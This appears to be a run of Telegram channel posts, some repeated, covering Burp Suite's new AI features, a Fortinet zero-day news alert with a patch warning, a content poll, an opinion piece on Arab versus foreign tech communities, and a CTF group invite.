شكرا علي قرائه المقال حبيت اشارك معلومه تفيدكم و عن تجربها و قبل ما تمشي بص علي مصادر :
https://portswigger.net/burp/ai
بلاك : الحق البرب سويت اضاف فيها ذكاء اصطناعي
سبايدر : عارف دي قديمه بس مش عارف استخدمها
بلاك : شوفت مقال سبايدر سيك ؟
سبايدر : لا
بلاك : طب شوف كد
----------------------------------------------------
عزيزي القارئ اهلا بيك في مقال جديد ✨
عنوان المقال :
Burpsuite and ai
في تاريخ :
2025/3/15
شركه portsawger المصنعه لي البرب سويت نزلت اول مقال ( " blog " )
عشان اضافه الذكاء الاصطناعي و هنا العالم اتقلب حرفيا
بداء يطلع مقارنات بين اده تانيه اسمه كايدو و البرب سويت بحكم ان لاتنين شغالين بذكاء اصطناعي
طيب يا سبايدر اي هيا البرب سويت ؟
البرب يعزيزي بختصار اده تقوم بقرائه الطلب و الرد الخاص بل موقع
Proxy
اي دا بس كد ؟
شوفت ازاي يعزيزي و انت رايح شاري كورس 9 ساعات شرح البرب سويت
المهم اده البرب سويت مش شرط تعمل كد وبس لا هيا فيها اضافات تانيه زي مثلا
Collaborator
ودي بتعمل localhost علي خفيف بحيس انه تستقبل الطلبات و تشوف زي مثلا http او dns وقتها ممكن تكتشف ثغره
SSRF
و اضافات تانيه كتير بس دا مش موضوع المقال
موضوعنا ان ازاي الشركه تضيف ai و ينجح النجاح الرهيب دا
طيب يا سبايدر انا عندي البرب سويت و مفيش كلام دا
مهو يعزيزي هو موجود بس في نسخه البرو و لاسوء من كد انو بفلوس في نسخه برو
يعني انا بعد ما اشتري النسخه البرو عشان ai القي ai بفلوس ؟
الحقيقه يعزيزي لا بس لو نزلتها كراك و انا مش انصح بدا اه
طيب اي فايده الذكاء الاصطناعي في البرب ؟
ببساطه تخفف عليك من حيث اكتشاف الدومينات و الثغرات
يعني انا ب دوسه واحده اقدر اعمل recon و كمان اكتشف الثغره !!!!
صحيح كلامك يعزيزي عشان كد هتلقي سعرها غالي شويه مقارنه بل عادي
دا غير ان في اضافات الي في
Bapps
مجرد انك تكتب ai في سيرش هتلقي كل ادوات ai بدون نجوم
و دي هتطور الذكاء الاصطناعي يبقي اقوي بس مش تبقي اوفر فيها عشان هتلقي جهازك بقي ضعيف فل استخدام
طيب يا سبايدر لو انا عايز انزلها اجيبها ازاي ؟
اول حاجه يعزيزي و نصيحه اخويه ابعد عن اوتو ماشين غير لما تلقي نفسك متقن لي مانول
تاني حاجه هات ايميل جامعي و ادخل علي موقع بورت سويجر و سجل الجيميل هيجيلك مفتاح البرب سويت برو و معا
10,000
نقطه لي استخدام الذكاء الاصطناعي و عيش انت بقي 🤍
شكرا علي قرائه المقال حبيت اشارك معلومه تفيدكم و عن تجربها و قبل ما تمشي بص علي مصادر :
https://portswigger.net/burp/ai
❤1
Chat Between Black and Spider
Black: Yo! Did you hear? Burp Suite just added AI features!
Spider: I know, it's old news—but I don’t know how to use it.
Black: Did you check out the SpiderSec article?
Spider: Nope.
Black: Then take a look at this.
---
Dear reader, welcome to a new article!
Title: Burp Suite and AI
Date: 2025/03/15
---
Burp Suite and AI – A New Era Begins
PortSwigger, the company behind Burp Suite, released its first official blog post announcing the integration of Artificial Intelligence (AI) into the tool — and the cybersecurity world went wild.
Soon after, comparisons started popping up between Burp Suite and another AI-powered tool called Kaido, since both now operate using smart automation.
---
So, Spider, what is Burp Suite anyway?
In short, Burp Suite is a proxy tool that intercepts and reads web requests and responses between your browser and a website.
Spider: “Is that all?”
Black: You see? And you bought a 9-hour course just to learn Burp Suite?
---
Of course, Burp does way more than that. It has powerful extensions like:
Collaborator
A built-in service that works like a "lightweight localhost", allowing you to catch incoming interactions like HTTP and DNS requests — great for discovering vulnerabilities like SSRF.
And many other extensions as well… but let’s stay focused on the main topic:
---
So how did AI make such a huge impact in Burp Suite?
Well, Burp Suite’s new AI features are available only in the Pro version, and yes, you have to pay to access them.
Spider: “Wait... so after I buy Burp Suite Pro, I still have to pay for AI?”
Black: Actually, no. The AI feature comes included with the Pro version. But if you're using a cracked version (which we don’t recommend), it won’t work.
---
What does AI do in Burp Suite?
Simply put, it helps you discover domains and vulnerabilities faster.
With one click, you can automate recon and even find potential flaws — making your testing faster and smarter.
That’s one reason the Pro version is more expensive, but it also includes support and updates.
---
And what about BApp Store?
When you go to Extender → BApp Store, just type "AI" in the search bar. You’ll find all available AI tools (with no star ratings yet, since they’re still fresh).
But don’t overuse them — they can be heavy on your system if you run too many at once.
---
How do I get the AI features?
Here’s some advice:
1. Don’t jump into automation until you’ve mastered manual testing.
2. Use a student email and register on PortSwigger’s official site.
3. You’ll receive a free Burp Suite Pro license with 10,000 AI credits to get started.
Enjoy the experience!
---
Thanks for reading!
I wanted to share this info based on my own experience — and don’t forget to check the source:
https://portswigger.net/burp/ai
Black: Yo! Did you hear? Burp Suite just added AI features!
Spider: I know, it's old news—but I don’t know how to use it.
Black: Did you check out the SpiderSec article?
Spider: Nope.
Black: Then take a look at this.
---
Dear reader, welcome to a new article!
Title: Burp Suite and AI
Date: 2025/03/15
---
Burp Suite and AI – A New Era Begins
PortSwigger, the company behind Burp Suite, released its first official blog post announcing the integration of Artificial Intelligence (AI) into the tool — and the cybersecurity world went wild.
Soon after, comparisons started popping up between Burp Suite and another AI-powered tool called Kaido, since both now operate using smart automation.
---
So, Spider, what is Burp Suite anyway?
In short, Burp Suite is a proxy tool that intercepts and reads web requests and responses between your browser and a website.
Spider: “Is that all?”
Black: You see? And you bought a 9-hour course just to learn Burp Suite?
---
Of course, Burp does way more than that. It has powerful extensions like:
Collaborator
A built-in service that works like a "lightweight localhost", allowing you to catch incoming interactions like HTTP and DNS requests — great for discovering vulnerabilities like SSRF.
And many other extensions as well… but let’s stay focused on the main topic:
---
So how did AI make such a huge impact in Burp Suite?
Well, Burp Suite’s new AI features are available only in the Pro version, and yes, you have to pay to access them.
Spider: “Wait... so after I buy Burp Suite Pro, I still have to pay for AI?”
Black: Actually, no. The AI feature comes included with the Pro version. But if you're using a cracked version (which we don’t recommend), it won’t work.
---
What does AI do in Burp Suite?
Simply put, it helps you discover domains and vulnerabilities faster.
With one click, you can automate recon and even find potential flaws — making your testing faster and smarter.
That’s one reason the Pro version is more expensive, but it also includes support and updates.
---
And what about BApp Store?
When you go to Extender → BApp Store, just type "AI" in the search bar. You’ll find all available AI tools (with no star ratings yet, since they’re still fresh).
But don’t overuse them — they can be heavy on your system if you run too many at once.
---
How do I get the AI features?
Here’s some advice:
1. Don’t jump into automation until you’ve mastered manual testing.
2. Use a student email and register on PortSwigger’s official site.
3. You’ll receive a free Burp Suite Pro license with 10,000 AI credits to get started.
Enjoy the experience!
---
Thanks for reading!
I wanted to share this info based on my own experience — and don’t forget to check the source:
https://portswigger.net/burp/ai
🏆1
🚨 Critical Fortinet 0-Day Exploited in Attacks!
Hackers are hitting FortiVoice systems in the wild—logging creds, wiping crash logs, scanning networks.
CVE-2025-32756 (CVSS 9.6) affects:
—FortiVoice, FortiMail, FortiNDR
—FortiRecorder, FortiCamera
Exploitable without login via crafted HTTP requests.
🔗 Details: https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
Hackers are hitting FortiVoice systems in the wild—logging creds, wiping crash logs, scanning networks.
CVE-2025-32756 (CVSS 9.6) affects:
—FortiVoice, FortiMail, FortiNDR
—FortiRecorder, FortiCamera
Exploitable without login via crafted HTTP requests.
🔗 Details: https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
🚨 ثغرة خطيرة جدًا (0-Day) في Fortinet يتم استغلالها حاليًا!
الهاكرز بيستهدفوا أنظمة FortiVoice بالفعل في هجمات حقيقية — بيسجلوا بيانات الدخول، ويمسحوا سجلات الأعطال (crash logs)، ويمسحوا الشبكات (network scanning).
تفاصيل الثغرة:
CVE-2025-32756
درجة الخطورة: 9.6 من 10 (حرجة جدًا حسب CVSS)
الأنظمة المتأثرة:
FortiVoice
FortiMail
FortiNDR
FortiRecorder
FortiCamera
الأخطر:
الثغرة لا تتطلب تسجيل دخول ويمكن استغلالها من خلال طلبات HTTP مُصاغة خصيصًا (crafted requests).
🔗 التفاصيل الكاملة هنا:
https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
أنصحك تطلع على الرابط وتشوف إذا كنت بتستخدم أي من الأجهزة دي — وحدث فورًا!
الهاكرز بيستهدفوا أنظمة FortiVoice بالفعل في هجمات حقيقية — بيسجلوا بيانات الدخول، ويمسحوا سجلات الأعطال (crash logs)، ويمسحوا الشبكات (network scanning).
تفاصيل الثغرة:
CVE-2025-32756
درجة الخطورة: 9.6 من 10 (حرجة جدًا حسب CVSS)
الأنظمة المتأثرة:
FortiVoice
FortiMail
FortiNDR
FortiRecorder
FortiCamera
الأخطر:
الثغرة لا تتطلب تسجيل دخول ويمكن استغلالها من خلال طلبات HTTP مُصاغة خصيصًا (crafted requests).
🔗 التفاصيل الكاملة هنا:
https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
أنصحك تطلع على الرابط وتشوف إذا كنت بتستخدم أي من الأجهزة دي — وحدث فورًا!
محتوي بكره : Next time content
Anonymous Poll
67%
Red team : فريق لاحمر
5%
Blue team : فريق لازرق
28%
Ai : ذكاء اصطناعي
❤2🌚1
يااا يعزيزي اخبارك اي طبعا عايز اقولك اني فدراسه و داخل علي امتحانات فا ياريت تدعيلي و هغيب فتره ✨🌑
-------------------------------------
عنوان مقال النهارده :
كلام دا انا عارف بره موضوع القناه و عارف انو هيزعل ناس كتيره بس دا الواقع
و الحقيقه مش بتزعل
الفرق بساطه ف كلمه واحده ان مجتمع عربي يشجع الغير و مش يشجع النفس و لاجنبي العكس
المجتمع العربي تلقي معلومات صحيحه ولكن مش كامله او ملخبطه يقولك لا دي صحيحه
المجتمع لاجنبي يعيد نفس معلومه مليون مره عشان يتاكد هل هيا صح ولا لا و هل في افكار تانيه ولا لا
طيب هل دا معني مجتمع العربي مش في تقدم
لاجابه اه
مثال كنت فمره اتكلمت عن برب ai و لقيت شخص بيقولي خلي ذكاء اصطناعي يخترق بدالك نفس موضوع نزلتو في مجتمع اجنبي الرد كان العكس و ان دي حاجه مفيده
طيب هل كد كل عرب مش كويسين ؟
لا في منهم ناس شاطرين جدا بس مشكلتهم انهم بيفيدو مجتمع و بيركزو علي مجتمع غربي اكتر الي من رحم ربي طبعا
طيب هل كل لاجانب حلوين ؟
لاجابه لا لاجانب كلهم يفضلو نفسهم علي غيرهم و دا غير العنصريه و كل كلام دا
بس الفرق ان دول يفيدو بعض مجانا و دول يقتلو بعض
حابب اختم كلام ب مقوله ل احمد زويل كان بيقول فيها
الغرب ليسوا عباقرة ونحن لسنا أغبياء... هم فقط يدعمون الفاشل حتى ينجح ونحن نحارب الناجح حتى يفشل
-------------------------------------
عنوان مقال النهارده :
اي الفرق مبين مجتمع عربي و اجنبي
كلام دا انا عارف بره موضوع القناه و عارف انو هيزعل ناس كتيره بس دا الواقع
و الحقيقه مش بتزعل
الفرق بساطه ف كلمه واحده ان مجتمع عربي يشجع الغير و مش يشجع النفس و لاجنبي العكس
المجتمع العربي تلقي معلومات صحيحه ولكن مش كامله او ملخبطه يقولك لا دي صحيحه
المجتمع لاجنبي يعيد نفس معلومه مليون مره عشان يتاكد هل هيا صح ولا لا و هل في افكار تانيه ولا لا
طيب هل دا معني مجتمع العربي مش في تقدم
لاجابه اه
مثال كنت فمره اتكلمت عن برب ai و لقيت شخص بيقولي خلي ذكاء اصطناعي يخترق بدالك نفس موضوع نزلتو في مجتمع اجنبي الرد كان العكس و ان دي حاجه مفيده
طيب هل كد كل عرب مش كويسين ؟
لا في منهم ناس شاطرين جدا بس مشكلتهم انهم بيفيدو مجتمع و بيركزو علي مجتمع غربي اكتر الي من رحم ربي طبعا
طيب هل كل لاجانب حلوين ؟
لاجابه لا لاجانب كلهم يفضلو نفسهم علي غيرهم و دا غير العنصريه و كل كلام دا
بس الفرق ان دول يفيدو بعض مجانا و دول يقتلو بعض
حابب اختم كلام ب مقوله ل احمد زويل كان بيقول فيها
الغرب ليسوا عباقرة ونحن لسنا أغبياء... هم فقط يدعمون الفاشل حتى ينجح ونحن نحارب الناجح حتى يفشل
❤2
https://t.me/+eqdcTQkHYj02MGRk
الناس الي دخلت ctf معايا دا جروب تلجرام عشان هنزل في قوانين ctf و كل حاجه
الناس الي دخلت ctf معايا دا جروب تلجرام عشان هنزل في قوانين ctf و كل حاجه
Telegram
Ctf
SPIDER SECURITY invites you to join this group on Telegram.
❤1